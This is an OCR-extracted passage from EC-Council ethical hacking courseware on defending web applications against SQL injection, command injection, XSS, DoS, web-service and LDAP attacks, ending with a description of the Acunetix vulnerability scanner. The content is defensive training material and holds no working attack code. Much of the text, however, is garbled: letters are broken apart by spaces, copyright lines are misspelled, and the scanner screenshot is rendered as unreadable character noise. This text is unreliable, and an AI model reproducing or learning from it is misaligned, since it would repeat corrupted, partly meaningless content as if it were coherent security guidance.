used f o r e n c o d in g e m a il a tta c h m e n ts f o r SM TP a n d used f o r e n c o d in g u s e r c re d e n tia ls . Exam ple:
Hello Jason
A125C458D8 123B684AD9
cake
c h a r a c t e r s w i t h "% u " f o ll o w e d b y t h e c h a r a c t e r 's e x p r e s s e d i n h e x a d e c im a l:
0110001101100001011010110110 0101
Base64 Encoding: 011000
%u2215 %u00e9
U TF-8 It is a
110110 000101 101011 011001 010000 000000 000000
v a r ia b le - le n g t h th a t in uses
e n c o d in g each b y te and
s ta n d a rd e x p re s s e d
h e x a d e c im a l
p r e c e d e d b y t h e % p r e f ix :
% c2% a9
%2%89%a0
TA BLE 1 3 .2 : Encoding Schem es Table
Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is S trictly Prohibited.

How to Defend Against SQL Injection Attacks

L im it th e le n g th o f u s e r in p u t Use c u s to m e r r o r m essages M o n it o r DB tr a f fic using an IDS, W AF D isable c o m m a n d s lik e x p _ c m d s h e ll Is o la te d a ta b a s e s e rv e r a n d w e b s e rv e r
C EH
JT
A lw a y s use m e th o d a ttr ib u te s e t t o POST Run d a ta b a s e se rv ic e a c c o u n t w ith m in im a l rig h ts M o v e e x te n d e d s to re d p ro c e d u re s t o an is o la te d s e rv e r Use typesafe variables o r fu n c tio n s such as IsN um eric() t o ensure ty p e s a fe ty V a lid a te a n d s a n itiz e user in p u ts passed t o th e d a ta b a s e Use lo w p riv ile g e d a c c o u n t f o r DB c o n n e c tio n
M ic ro s o ft
SQL S e rve r
How to D efend Against SQL Injection Attacks

T o d e f e n d a g a in s t SQL in j e c t i o n a tta c k s , v a r io u s t h in g s h a ve t o be t a k e n ca re o f like u n c h e c k e d u s e r - i n p u t t o d a t a b a s e - q u e r i e s s h o u ld n o t be a ll o w e d t o pass. E ve ry u s e r v a r ia b le p assed t o t h e d a ta b a s e s h o u ld be v a li d a t e d a n d s a n itiz e d . T h e g iv e n i n p u t s h o u ld be c h e c k e d f o r a n y e x p e c te d d a ta t y p e . U se r i n p u t , w h i c h is passed t o t h e d a ta b a s e , s h o u ld be q u o t e d . e e e e e e e 0 0 L im it t h e le n g t h o f u s e r i n p u t Use c u s t o m e r r o r m essa ge s M o n i t o r DB t r a f f i c u sin g an IDS, W A P D isab le c o m m a n d s like x p _ c m d s h e ll Is o la te d a ta b a s e s e r v e r a n d w e b s e rv e r A lw a y s use m e t h o d a t t r i b u t e s e t t o POST Run d a ta b a s e se rv ic e a c c o u n t w i t h m in i m a l rig h ts M o v e e x t e n d e d s t o r e d p r o c e d u r e s t o an i s o l a t e d s e r v e r Use ty p e s a f e v a r ia b le s o r f u n c t i o n s such as Is N u m e r ic ( ) t o e n s u r e t y p e s a f e t y V a lid a t e a n d s a n itiz e u s e r i n p u t s p assed t o t h e d a ta b a s e
EC-C0UnCil

Use l o w p r iv ile g e d a c c o u n t f o r DB c o n n e c t i o n
EC-C0UnCil

How to Defend Against Command Injection Flaws
- - J L E !
0
^ '
/ How to D efend Against Com m and Injection Flaws

The s im p le s t w a y to p r o t e c t a g a in s t c o m m a n d in je c tio n f la w s is t o a v o id t h e m
w h e r e v e r p o ssib le . S o m e la n g u a g e s p e c ific lib r a r ie s p e r f o r m i d e n t ic a l f u n c t i o n s f o r m a n y shell c o m m a n d s a n d s o m e s y s te m calls. T h e s e lib r a r ie s d o n o t c o n t a i n t h e o p e r a t i n g s y s te m shell i n t e r p r e t e r , a n d so i g n o r e m a x i m u m shell c o m m a n d p r o b l e m s . For t h o s e calls t h a t m u s t still be used , such as calls t o b a c k e n d d a ta b a s e s , o n e m u s t c a r e f u l l y v a li d a t e t h e d a ta t o e n s u r e t h a t it d o e s n o t c o n t a i n m a lic io u s c o n t e n t . O n e can also a r r a n g e v a r io u s r e q u e s ts in a p a t t e r n , w h i c h e n s u re s t h a t all g iv e n p a r a m e t e r s a re t r e a t e d as d a ta in s te a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t . M o s t s y s te m calls a n d t h e use o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t v a lid i n p u t s tr in g s t o access a d a ta b a s e o r p r e p a r e d s t a t e m e n t s p r o v id e s i g n ific a n t p r o t e c t i o n , e n s u r in g t h a t t h e s u p p lie d i n p u t is t r e a t e d as d a ta , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e risk in v o lv e d in th e s e e x t e r n a l calls. O n e can a lw a y s a u t h o r i z e t h e in p u t to e n s u re t h e p r o t e c t i o n o f t h e a p p li c a t i o n in q u e s t i o n . Least p riv ile g e d a c c o u n ts m u s t be u sed t o access a d a ta b a s e so t h a t t h e r e is t h e s m a lle s t p o s s ib le lo o p h o le . T h e o t h e r s t r o n g p r o t e c t i o n a g a in s t c o m m a n d i n j e c t i o n is t o ru n w e b a p p li c a t i o n s w i t h t h e p riv ile g e s r e q u i r e d t o c a r r y o u t t h e i r f u n c t io n s . T h e r e f o r e , o n e s h o u ld a v o id r u n n i n g t h e w e b s e rv e r as a r o o t , o r a cc e ssin g a d a ta b a s e as a D B A D M I N , o r else an a t t a c k e r m a y b e a b le t o m is u s e a d m i n i s t r a t i v e r ig h ts . T h e use o f Java s a n d b o x in t h e J2EE e n v i r o n m e n t s to p s t h e e x e c u t i o n o f t h e s y s te m c o m m a n d s .
EC-C0UnCil

T h e use o f an e x t e r n a l c o m m a n d t h o r o u g h l y ch e c k s u s e r i n f o r m a t i o n t h a t is i n s e r t e d i n t o t h e c o m m a n d . C re a te a m e c h a n is m f o r h a n d lin g all p o s s ib le e r r o r s , t i m e o u t s , o r b lo c k a g e s d u r in g t h e calls. T o e n s u r e t h e e x p e c t e d w o r k is a c t u a lly p e r f o r m e d , c h e c k all t h e o u t p u t , r e t u r n , a nd e r r o r c o d e s f r o m t h e call. A t le a s t t h is a llo w s t h e u s e r t o d e t e r m i n e if s o m e t h i n g has g o n e
w r o n g . O t h e r w i s e , an a t t a c k m a y o c c u r a n d n e v e r be d e t e c t e d . P e r f o r m i n p u t v a li d a t i o n Use la n g u a g e - s p e c ific lib r a r ie s t h a t a v o id p r o b l e m s d u e t o shell c o m m a n d s Use a s afe API t h a t a v o id s t h e use o f t h e i n t e r p r e t e r e n t i r e l y Use p a r a m e t e r i z e d SQL q u e r ie s Escape d a n g e r o u s c h a r a c te r s P e r f o r m i n p u t a n d o u t p u t e n c o d in g S t r u c t u r e r e q u e s ts so t h a t all s u p p lie d p a r a m e t e r s a re t r e a t e d as d a ta , r a t h e r t h a n p o te n tia lly e x e c u ta b le c o n te n t Use m o d u l a r shell d is a s s o c ia tio n f r o m k e rn e l
EC-C0UnCil

H ow to D e fe n d A g a in st XSS A tta ck s
V a lid a te a ll h e a d e r s , c o o k ie s , q u e r y s tr in g s , f o r m f ie ld s , a n d h id d e n f ie ld s ( i. e ., a ll p a r a m e t e r s ) a g a in s t a r ig o r o u s s p e c ific a t io n E n c o d e In p u t and o u tp u t and f ilt e r M e ta c h a r a c te r s in t h e in p u t U s e t e s t i n g t o o ls e x t e n s iv e ly d u r in g t h e d e s ig n p h a s e t o e lim in a t e s u c h XSS h o le s in t h e a p p lic a tio n b e f o r e i t g o e s in t o u s e
C EH
D o n o t a lw a y s t r u s t w e b s it e s t h a t u s e HTTPS w h e n it co m e s to XSS
\y
D e v e lo p s o m e s ta n d a rd o r s ig n in g s c rip ts w ith p r iv a te a n d p u b lic k e y s t h a t a c tu a lly c h e c k t o a s c e rta in t h a t t h e s c rip t in tr o d u c e d is re a lly a u th e n tic a te d
%
\
4
/
/
C o n v e r t a ll n o n a lp h a n u m e r ic c h a ra c te rs t o H T M L c h a r a c te r e n titie s b e fo r e d is p la y in g t h e u s e r in p u t in s e arch e n g in e s a n d f o r u m s
U se a w e b a p p lic a tio n f ir e w a l l t o b lo c k t h e e x e c u tio n o f m a lic io u s s c r ip t
F ilt e r in g s c r ip t o u t p u t c a n a ls o d e f e a t XSS v u l n e r a b il it ie s b y p r e v e n t in g t h e m f r o m b e in g t r a n s m i t t e d t o u s e rs
How to D efend Against XSS Attacks

| Q T h e f o l l o w i n g a re t h e d e fe n s iv e t e c h n i q u e s t o p r e v e n t XSS a tta c k s : C he ck a n d v a li d a t e all t h e f o r m fie ld s , h id d e n fie ld s , h e a d e rs , c o o k ie s , q u e r y strin g s , a nd all t h e p a r a m e t e r s a g a in s t a r i g o r o u s s p e c ific a t io n . I m p l e m e n t a s t r i n g e n t s e c u r it y p o lic y . W e b se rv e rs , a p p li c a t i o n s e rv e rs , a n d w e b a p p li c a t i o n e n v i r o n m e n t s a re v u ln e r a b l e t o c ro s s -s ite s c r ip tin g . It is h a r d t o i d e n t i f y a n d r e m o v e XSS f l a w s f r o m w e b a p p lic a tio n s . T h e b e s t w a y t o f i n d f la w s is t o p e r f o r m a s e c u r it y r e v i e w o f t h e c o d e , a n d s e a rch in all t h e places w h e r e i n p u t f r o m an HTTP r e q u e s t c o m e s as an o u t p u t t h r o u g h H T M L. A v a r i e t y o f d i f f e r e n t H T M L ta g s can be u sed t o t r a n s m i t a m a lic io u s Ja va S crip t. Nessus, N ik to , a n d o t h e r t o o ls can h e lp t o s o m e e x t e n t f o r s c a n n in g w e b s i t e s f o r th e s e fla w s . o t h e r a tta c k s . F ilte r t h e s c r ip t o u t p u t t o d e f e a t XSS v u l n e r a b i l i t i e s w h i c h can p r e v e n t t h e m f r o m b e in g t r a n s m i t t e d t o users. T h e e n t i r e c o d e o f t h e w e b s i t e has t o be r e v i e w e d if it has t o be p r o t e c t e d a g a in s t XSS a tta c k s . T h e s a n ity o f t h e c o d e s h o u ld b e c h e c k e d by r e v i e w i n g a n d c o m p a r i n g it a g a in s t e x a c t s p e c ific a t io n s . T h e a re as s h o u ld be c h e c k e d as f o l lo w s : t h e h e a d e rs , as w e l l as EC-C0UnCil If
v u l n e r a b i l i t y is d is c o v e r e d in o n e w e b s i t e , t h e r e is a h ig h c h a n c e o f it b e in g v u ln e r a b l e t o

c o o k ie s , q u e r y s tr in g f o r m fie ld s , a n d h id d e n fie ld s . D u r in g t h e v a li d a t i o n p ro ce ss, t h e r e m u s t be n o a t t e m p t t o re c o g n iz e t h e a c tiv e c o n t e n t , n e i t h e r t o r e m o v e t h e f i l t e r n o r s a n itiz e it. T h e r e a re m a n y w a y s t o e n c o d e t h e k n o w n f i l t e r s f o r a c tiv e c o n t e n t . A " p o s i t i v e s e c u r i t y p o l i c y " is h ig h ly r e c o m m e n d e d , w h i c h s p e c ifie s w h a t has t o be a ll o w e d a nd w h a t has t o be r e m o v e d . N e g a t iv e o r a t t a c k s ig n a t u r e - b a s e d p o lic ie s a re h a r d t o
m a i n t a i n , as t h e y a re i n c o m p l e t e . 0 I n p u t fie ld s s h o u ld be l i m i t e d t o a m a x i m u m since m o s t s c r ip t a tta c k s n e e d s e v e ra l c h a r a c te r s t o g e t s t a r t e d .
EC-C0UnCil

How to Defend Against DoS Attack

S e c u re t h e r e m o te a d m in is tra tio n a n d c o n n e c tiv ity te s tin g
C EH
P r e v e n t use o f u n n e c e s s a ry C o n fig u re t h e f ir e w a ll t o d e n y e x te r n a l I n te r n e t C o n tr o l M e s s a g e P ro to c o l (IC M P ) t r a f fic access fu n c tio n s s u c h as g e ts , s trc p y , a n d r e tu rn a d d re s s e s fr o m o v e r w r it t e n e tc .
P re v e n t t h e s e n s itiv e in fo r m a tio n f r o m o v e r w r itin g D a ta p ro c e s s e d b y th e a tta c k e r s h o u ld b e s to p p e d f r o m b e in g e x e c u te d
P e rfo rm th o r o u g h in p u t v a lid a tio n
How to D efend Against DoS Attacks

a tta c k s : C o n fig u r e t h e f i r e w a l l t o d e n y e x t e r n a l I n t e r n e t C o n t r o l M e s s a g e P r o t o c o l (IC M P ) t r a f f i c access. S e cu re t h e r e m o t e a d m i n i s t r a t i o n a n d c o n n e c t i v i t y t e s tin g . P r e v e n t use o f u n n e c e s s a r y f u n c t i o n s such as gets, s tr c p y , a n d r e t u r n a d d re s s e s f r o m b e in g o v e r w r i t t e n , etc. 0 0 P re ve n t se n s itiv e in f o r m a t io n fr o m o v e rw ritin g . P e rfo rm th o r o u g h in p u t v a lid a tio n . D ata p ro c e s s e d b y t h e a t t a c k e r s h o u ld be s t o p p e d f r o m b e in g e x e c u te d . T h e f o l l o w i n g a re t h e v a r io u s m e a s u r e s t h a t can be a d o p t e d t o d e f e n d a g a in s t DoS
EC-C0UnCil

How to Defend Against Web Services Attack

Configure firewalls/IDS systems for a web services anomaly and signature detection
C EH
Configure W SD L Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
Configure firewalls/IDS systems to filter improper SO AP and X M L syntax
Use document-centric authentication credentials that useSA M L
Implement centralized in-line requests and responses schema validation
Use multiple security credentials such as X.509 Cert, SAML assertions and WS-Security
Block external references and use pre-fetched content when de-referencing URLs
Deploy w eb services-capable firewalls capable of SOAP and ISAPI level filtering
M aintain and updatea secure repository of XM L schemas
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
How to D efend Against Web Services Attacks

T o d e f e n d a g a in s t w e b se rv ic e s a tta c k s , t h e r e s h o u ld be a p r o v is io n f o r m u l t i p l e laye rs o f p r o t e c t i o n t h a t d y n a m i c a ll y e n fo r c e s l e g i t i m a t e a p p li c a t i o n usage a n d b lo c k s all k n o w n a t t a c k p a th s w i t h o r w i t h o u t r e ly in g o n s ig n a t u r e d a ta b a s e s . T his c o m b i n a t i o n has p r o v e n e f f e c t i v e in b lo c k in g e v e n u n k n o w n a tta c k s . S t a n d a r d HTTP a u t h e n t i c a t i o n t e c h n i q u e s such as d ig e s t a nd SSL c lie n t- s id e c e r t i f i c a t e s can be u sed f o r w e b s e rv ic e s as w e ll. Since m o s t m o d e ls i n c o r p o r a t e b u s in e s s - to - b u s in e s s a p p lic a tio n s , it b e c o m e s e a s ie r t o r e s t r i c t access t o o n l y v a lid users. 6 C o n fig u r e fir e w a lls /ID S s f o r a w e b se rv ic e s a n o m a l y a n d s ig n a t u r e d e t e c t i o n . C o n fig u r e W S D L Access C o n t r o l P e rm is s io n s t o g r a n t o r d e n y access t o a n y t y p e o f W S D L - b a s e d SOAP m e s s a g e s . Q 0 C o n fig u r e fir e w a l l s / I D S s y s te m s t o f i l t e r i m p r o p e r SOAP a n d X M L s y n ta x . Use d o c u m e n t - c e n t r i c a u t h e n t i c a t i o n c r e d e n t ia ls t h a t use SAM L. I m p l e m e n t c e n tr a liz e d in - lin e r e q u e s ts a n d r e s p o n s e s s c h e m a v a l i d a t i o n . Use m u l t i p l e s e c u r it y c r e d e n t i a l s such as X .5 0 9 C ert, S A M L a s s e r tio n s , a n d W S -S e c u r ity . B lo ck e x t e r n a l r e fe r e n c e s a n d use p r e - f e t c h e d c o n t e n t w h e n d e - r e f e r e n c i n g URLs.
D e p lo y w e b - s e r v ic e s - c a p a b le f i r e w a l l s c a p a b le o f SOAP- a n d ISAPI-level f i l t e r i n g .
EC-C0UnCil

M a i n t a i n a n d u p d a t e a s e c u re r e p o s i t o r y o f X M L s c h e m a s .
EC-C0UnCil

Web A p p lication C o u n term ea su res

U n v a lid a t e d R e d ire c ts ^ and Forw ards
e A v o id using re d ire c ts a n d fo rw a rd s I f d e s tin a tio n p a ra m e te rs c a n n o t be a v o id e d , e n s u re th a t th e su p p lie d v a lu e is v a lid , and a u th o riz e d f o r th e user 8 S
C EH
B ro k e n A u t h e n t i c a t io n a n d S e s s io n M a n a g e m e n t
8 U se SSL f o r a ll a u th e n tic a te d p a rts o f th e a p p lic a tio n V e rify w h e th e r a ll th e users' id e n titie s a n d c re d e n tia ls a re s to re d in a h a s h e d fo r m N e v e r s u b m it session d a ta as p a rt o f a GET, POST
C ro s s -S ite R e q u e s t Forgery
L o g o ff im m e d ia te ly a f te r using a w e b a p p lic a tio n and c le a r th e h is to r y Do n o t a llo w y o u r b ro w s e r and w e b s ite s t o save lo g in d e ta ils C heck th e HTTP R e fe rre r h e a d e r and w h e n pro c e s s in g a POST, ig n o re URL p a ra m e te rs
I n s e c u r e C r y p to g r a p h ic S to r a g e
C D o n o t c re a te o r use w e a k c r y p to g ra p h ic a lg o r ith m s G e n e ra te e n c r y p tio n k e y s o fflin e a n d s to re th e m s e c u re ly E nsure th a t e n c ry p te d d a ta s to re d o n disk is n o t easy t o d e c r y p t
Web A pplication C ounterm easures

T h e f o l l o w i n g a re t h e v a r io u s c o u n t e - m e a s u r e s t h a t can be a d o p t e d f o r w e b a p p lic a tio n s . U n v a l i d a t e d R e d ir e c ts a n d F o r w a r d s A v o id u sin g r e d ir e c t s a n d f o r w a r d s if d e s t i n a t i o n p a r a m e t e r s c a n n o t be a v o id e d ; e n s u r e t h a t t h e s u p p lie d v a lu e is v a lid , a n d a u t h o r i z e d f o r t h e user. C ro ss -S ite R e q u e s t F o r g e r y Log o f f i m m e d i a t e l y a f t e r u sin g a w e b a p p li c a t i o n a n d c le a r t h e h is to r y . Do n o t a l l o w y o u r b r o w s e r a n d w e b s i t e s t o save log in d e ta ils . C he ck t h e HTTP R e f e r r e r h e a d e r a n d w h e n p ro c e s s in g a POST, i g n o r e URL p a r a m e t e r s .
B r o k e n A u t h e n t i c a t i o n a n d S e ssio n M a n a g e m e n t Use SSL f o r all a u t h e n t i c a t e d p a r ts o f t h e a p p lic a t io n . V e r if y w h e t h e r all t h e u sers' i d e n t it ie s a n d c r e d e n t i a l s a re s t o r e d in a h a s h e d f o r m . N e v e r s u b m i t session d a ta as p a r t o f a GET, POST.
EC-C0UnCil

In s e c u r e C r y p t o g r a p h i c S to r a g e Do n o t c r e a te o r use w e a k c r y p t o g r a p h ic a lg o r i t h m s . G e n e r a t e e n c r y p t i o n keys o f f l i n e a n d s t o r e t h e m s e c u re ly . E nsure t h a t e n c r y p t e d d a ta s t o r e d o n d is k is n o t easy t o d e c r y p t .
EC-C0UnCil

Web A p p lication Counterrnâ&ures

( C o n t d):
/ \ y /
S S S 2 S
I n s u f f i c i e n t T r a n s p o r t L a y e r P r o te c t io n
Non-SSL requests to web pages should be redirected to the SSL page Set the 'secure' flag on all sensitive cookies Configure SSL provider to support only strong algorithms Ensure the certificate is valid, not expired, and matches all domains used by the site Backend and other connections should also use SSL or other encryption technologies
TA
T A
D i r e c t o r y T ra v e rs a l
5 6 Define access rights to the protected areas of the website Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal
V \
W eb servers should be updated with security patches in a tim ely manner
sv
S S t! S
C o o k ie /S e s s io n P o is o n in g
Do not store plain text or weakly encrypted password in a cookie Implement cookie's tim eout Cookie's authentication credentials should be associated with an IP address Make logout functions available .Ccipyright by EC-CounGil. All Rights Reservei;Reproduction is Strictly Prohibited.
Web A pplication C ounterm easures (Contd)

T h e f o l l o w i n g a re t h e v a r io u s c o u n t e r m e a s u r e s t h a t can be a d o p t e d f o r w e b a p p lic a tio n s . In s u ffic ie n t T ra n s p o rt Layer P r o te c tio n Non-SSL r e q u e s ts t o w e b p ages s h o u ld be r e d ir e c t e d t o t h e SSL page. Set t h e 's e c u r e fla g o n all s e n s itiv e c o o k ie s . C o n fig u r e SSL p r o v i d e r t o s u p p o r t o n l y s t r o n g a lg o r i t h m s . E nsure t h e c e r t i f i c a t e is v a lid , n o t e x p ir e d , a n d m a t c h e s all d o m a i n s used by t h e site. B a c k e n d a n d o t h e r c o n n e c t i o n s s h o u ld also use SSL o r o t h e r e n c r y p t i o n te c h n o lo g ie s .
D i r e c t o r y T ra v e r s a l D e fin e access r ig h ts t o t h e p r o t e c t e d a re as o f t h e w e b s i t e . A p p l y c h e c k s / h o t fix e s t h a t p r e v e n t t h e e x p l o i t a t i o n o f t h e v u l n e r a b i l i t y such as U n ic o d e t o a f f e c t t h e d i r e c t o r y tr a v e r s a l. W e b s e rv e rs s h o u ld be u p d a t e d w i t h s e c u r it y p a tc h e s in a t i m e l y m a n n e r .
EC-C0UnCil

C o o k ie /S e ss io n P oisoning Q Do n o t s to r e p la in t e x t o r w e a k l y e n c r y p t e d p a s s w o r d in a c o o k ie . I m p l e m e n t c o o k ie 's t i m e o u t . C o o k ie 's a u t h e n t i c a t i o n c r e d e n t i a l s s h o u ld be a s s o c ia te d w i t h an IP a d d re ss. M a k e l o g o u t f u n c t i o n s a v a ila b le .
EC-C0UnCil
Web A p p lication C o u n term ea su res

( C o n t d )
C EH
S e c u rity M is c o n fig u ra tio n

C o n fig u re all s e c u rity m e c h a n is m s a n d tu rn o f f all u n u s e d serv ic e s S e tu p ro le s , p e rm is s io n s , and a c c o u n ts and d is a b le all d e f a u lt a c c o u n ts o rc h a n g e th e ir d e fa u lt pas s w o rd s Scan f o r la te s t s e c u rity v u ln e ra b ilitie s a n d a p p ly th e la te s t s e c u rity p a tc h e s P e rfo rm ty p e , p a tte rn , and d o m a in v a lu e v a lid a tio n o n all in p u t d a ta M a ke LDAP f ilt e r as s p e c ific as poss ib le V a lid a te a n d re s tr ic t th e a m o u n t o f d a ta r e tu rn e d to th e user Im p le m e n t t ig h t access c o n tr o l o n th e d a ta in th e LDAP d ire c to r y P e rfo rm d y n a m ic te s tin g and s o u rc e c o d e ana lysis
F ile I n j e c t i o n A tta c k
S tro n g ly v a lid a te u s e r in p u t C o n s id e r im p le m e n tin g a c h r o o t ja il PHP: D isable a llo w _ u r l_ fo p e n and a llo w _ u rl_ in c lu d e in p h p .in i PHP: D isable re g is te r_ g lo b a ls and use E _ S T R IC T to fin d u n in itia liz e d v a ria b le s PHP: E nsure th a t a ll f ile and s tre a m s fu n c tio n s (s tre a m _ * ) a re c a r e fu lly v e tte d
Web A pplication C ounterm easures (Contd)

T h e f o l l o w i n g a re t h e v a r io u s c o u n t e r m e a s u r e s t h a t can be a d o p t e d f o r w e b a p p lic a tio n s .
S e c u r it y M is c o n f ig u r a t io n
C o n fig u r e all s e c u r it y m e c h a n is m s a n d t u r n o f f all u n u s e d services. Set u p ro le s, p e r m is s io n s , a n d a c c o u n ts a n d d is a b le all d e f a u l t a c c o u n ts o r c h a n g e t h e i r d e f a u l t p a s s w o rd s .
Scan f o r la t e s t s e c u r it y v u ln e r a b i l it ie s a n d a p p ly t h e la t e s t s e c u r i t y p a tc h e s .
L D A P In je c t io n A tt a c k s
P e r f o r m t y p e , p a t t e r n , a n d d o m a i n v a lu e v a li d a t i o n o n all i n p u t d a ta . M a k e LDAP f i l t e r s as s p e c ific as p o ssib le . V a lid a t e a n d r e s t r i c t t h e a m o u n t o f d a ta r e t u r n e d t o t h e user. I m p l e m e n t t i g h t access c o n t r o l o n t h e d a ta in t h e LDAP d i r e c t o r y . P e r f o r m d y n a m i c t e s t i n g a n d s o u r c e c o d e analysis.
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

File In je c tio n A tta c k e 0 S t r o n g ly v a li d a t e u s e r in p u t . C o n s id e r i m p l e m e n t i n g a c h r o o t ja il. PHP: D isa b le a l l o w _ u r l _ f o p e n a n d a l l o w _ u r l _ i n c l u d e in p h p .in i. PHP: D isa b le r e g is t e r _ g lo b a ls a n d use E_STRICT t o f i n d u n in it ia liz e d v a ria b le s . PHP: E n sure t h a t all file a n d s tr e a m s f u n c t i o n s ( s t r e a m _ * ) a re c a r e f u l l y v e t t e d .
M o dule 13 Page 1935
EC-COUIICil

How to D efend A gainst Web A pplication Attacks
C EH
Make LDAP filter as specific as possible O p e ra tin g System LDAP S erver C ustom Error Page
How to D efend Against Web A pplication Attacks

To d e fe n d a g a in s t w e b a p p li c a t i o n a tta c k s , y o u can f o l l o w t h e c o u n t e r m e a s u r e s
s ta te d p r e v io u s ly . T o p r o t e c t t h e w e b s e rv e r, y o u can use W A F f i r e w a l l / I D S a n d f i l t e r p a cke ts. You n e e d t o c o n s t a n t ly u p d a t e t h e s o f t w a r e u sin g p a tc h e s t o k e e p t h e s e rv e r u p - t o - d a t e a n d t o p r o t e c t it f r o m a tta c k e r s . S a n itiz e a n d f i l t e r u s e r i n p u t , a n a ly z e t h e s o u r c e c o d e f o r SQL
in j e c t i o n , a n d m in i m i z e use o f t h i r d - p a r t y a p p li c a t i o n s t o p r o t e c t t h e w e b a p p lic a tio n s . You can also use s t o r e d p r o c e d u r e s a n d p a r a m e t e r q u e r ie s t o r e t r i e v e d a ta a nd d is a b le v e r b o s e e r r o r m essa ge s, w h i c h can g u id e t h e a t t a c k e r w i t h s o m e u s e fu l i n f o r m a t i o n a n d use c u s t o m e r r o r p ages t o p r o t e c t t h e w e b a p p lic a tio n s . T o a v o id SQL in j e c t i o n i n t o t h e d a ta b a s e , c o n n e c t u s in g a n o n - p r i v i l e g e d a c c o u n t a nd g r a n t le a s t p riv ile g e s t o t h e d a ta b a s e , ta b le s , a nd c o lu m n s . D isab le c o m m a n d s like x p _ c m d s h e ll, w h i c h can a f f e c t t h e OS o f t h e s y s te m .
EC-C0UnCil

yy
Perform input validation _
1 11 liiil
Configure the firew all to deny external ICMP traffic access 5
Shut down the unnecessary services and ports
A tta c k e r
L o g in F o rm
In te rn e t
Use WAF Firewall /IDS and filte r packets
Keep patches current
Connect to the database using non-prlvileged account Use stored procedures and param eter queries Grant least privileges to the database, tables, and columns Analyze the source code for SQL injection M inimize use o f 3rd party apps S a n itiz e a n d f i l t e r u s e r in p u t
* *
W e b A p p lic a tio n
Disable commands like xp_cmdshell
Perform dynamic testing and source code analysis
A
M ake LDAP filte r as specific as possible O p e r a tin g S y s te m LD AP S e rv e r Disable verbose error messages and use custom error pages
7 ? \
C u s to m E rro r Page
FIGURE 13.61: How to Defend Against Web Application Attacks
EC-C0UnCil

M o d u le F lo w
W e b A p p Pen Testing
0 I , &
" *S
C o u n term ea su re s
^M odule Flow
N o w w e w i ll discuss w e b a p p li c a t i o n s e c u r it y to o ls . W e b a p p li c a t i o n s e c u r it y t o o ls h e lp y o u t o d e t e c t t h e p o s s ib le v u ln e r a b i l it ie s in w e b a p p li c a t i o n s a u t o m a t i c a ll y . P r io r t o th is , w e d iscu sse d w e b a p p li c a t i o n c o u n t e r m e a s u r e s t h a t p r e v e n t a t ta c k e r s f r o m e x p l o i t i n g w e b a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u can also e m p l o y s e c u r it y t o o l s t o p r o t e c t y o u r w e b a p p li c a t i o n s f r o m b e in g h a c k e d . T o o ls in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e p ro te c tio n .
S e c u r i t y T o o ls
is ! !L 3
H acking M e th o d o lo g y
Ok
M odule 13 Page 1938 Ethical Hacking and C ounterm easures Copyright by
EC-C0UnCil

T his s e c tio n is d e d ic a t e d t o t h e s e c u r it y t o o l s t h a t p r o t e c t w e b a p p li c a t i o n s a g a in s t v a r io u s a tta c k s .
EC-C0UnCil

Web A pplication Security Tool: Acunetix Web Vulnerability Scanner

J Acunetix W VS checks web applications for SQL injections, cross-site scripting, etc.
r Eu i
Acunetix Web Vulnerability Scanner (Free Edition)
I t in c lu d e s a d v a n c e d p e n e tr a tio n te s tin g to o ls , such as th e HTTP E d ito r a n d th e HTTP Fuzzer
: File
Actions
Took ;
Confirmation
Help
J Nov Scan | [fe J Tcol-Expo-cr Web
_
a I -
3 a |*>
J | jt Rpperi
a |3 I | i
yStal JRl: lhl^)://lcsta*pret.'Ain*1el%J Piofife: Drffljl! gjj Alerts summary 77 alerts
P o rt scans a w e b s e rv e r a n d runs s e c u rity checks a g a in s t n e tw o rk services
Sana 0 Web Sta rr B Tod-0 * * <*}Sne Cia^c i :p T n ^ F n ie J t. Sjbdonah Scanna;
V d n x tb M y
S co n R ett**
BsM sam ior :
Tests w e b fo r m s a nd p a s s w o rd p r o te c te d areas
It in c lu d e s an a u to m a tic c lie n t s c rip t a n a ly z e r a llo w in g f o r s e c u rity te s tin g o f A jax and W eb 2 .0 a p p lic a tio n s
OMTTPEdto HTVsmffcr vfc HTTPPuzse: AutfwcM)n 1ee*r C O w e < te * J t *if! & web servrt Web Sc^vrc* Seanne ^ : Web Se v?e* td * r
- 0 5anT)r*: ( htto:/.tgs:aspnct.v<Jrr*cb. * >I B A0Aet3(77) 5 O ASSJE saddnqCradeYjnefablt * Q Bed SQ L ir*rcson PJ O cro* sue s r o tr g Cverrfted) C IO ) r s a *jeefco
r
Acunetix Threat Level J One or more hign seventy type vuinerabilrtifs hw t been dntcrertO b> west vj1ntrst>1ir!1; 3rd conproT1; tne backend database and'or de45ff you'
A acunetix three! lvol Level 3: High
O *o d c a c c ne rc rire s e a c c(3 ]
O ASPJETefr ne*M 9-{l)
(2 1 )
ft O C ro wP ro n eS ar^rg(8 )
9 O U a ed" * are sent n J*(
O Io0np5gew*fodguew rg0ttae So O P T IO N S*etod envied(1 )

S ^ S n w i Cod *Viaul S k u f Dai) 1 ! 9 b-cr page Web Strvtf C90 r d0C > O 08: Prentp^ ntpnikn* for l>1i
ToUl alctto found o High O Medium
B l t JC o r A y u m t b n
S:*" ' Ht'gv
O Informational 2J Ufoct information ht1 p://tetta 1 pnetvu inweb ri 7123 MQuMti
5:1 j> ot li 1 C TG e ra i P o < ra e '1 V e ra o nIn fw m o w n
O0 ': :**e txa y .ret icnM vc *1

i O 0 0 8 : I*txd logo page C IO )
5 ^ 5 * *
S
t \
O PrtM M dtyp eIn p u tv k lff! *u to co n td v
S un11 rinah.d
S ^p art Ctntm * P .<*

g ) Lkr* ) UM T M1. -4 A u iS r a
<L
V /rr:< x :0.20 01:30.02. SQl n a n -Srd) >*. * p* a 10.i0 O l J i J / , Mushed scanning. 10.20 01:22.32, Savng scan rJ!3 0 database... 12.20 01:32.39, Dcnr wv n , b 10.20 01:32.39, Fua t e Wftr*.
IfU lt',
d n : / t u n r .
http://w ww .acunetix.com
